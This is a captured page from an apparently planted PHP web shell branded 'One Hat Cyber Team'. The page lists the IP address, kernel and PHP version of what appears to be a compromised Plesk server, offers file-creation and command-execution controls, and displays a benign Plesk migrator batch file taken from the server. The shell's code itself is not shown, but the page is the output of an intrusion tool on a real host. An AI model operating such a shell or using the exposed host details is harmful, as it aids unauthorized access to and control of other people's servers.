⚝
One Hat Cyber Team
⚝
Your IP:
216.73.217.4
Server IP:
41.128.143.86
Server:
Linux host.raqmix.cloud 6.8.0-1025-azure #30~22.04.1-Ubuntu SMP Wed Mar 12 15:28:20 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.3.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
local
/
psa
/
admin
/
sbin
/
modules
/
site-import
/
View File Name :
plesk-migrator.bat
@echo off for /f "skip=2 tokens=3*" %%i IN ('reg query "HKLM\SOFTWARE\Plesk\PSA Config\Config" /v PRODUCT_DATA_D /reg:32') do set plesk_data_path=%%i %%j call :TRIM %plesk_data_path% plesk_data_path set PLESK_EXTENSION_ID=site-import set plesk_migrator_var_path=%plesk_data_path%var\modules\site-import set plesk_python_path=%plesk_migrator_var_path%\python\python.exe set plesk_migrator_backend_path=%plesk_dir%admin\plib\modules\site-import\backend\plesk-migrator.py "%plesk_python_path%" "%plesk_migrator_backend_path%" "%plesk_migrator_var_path%" %* goto :EOF :TRIM SET %2=%1 goto :EOF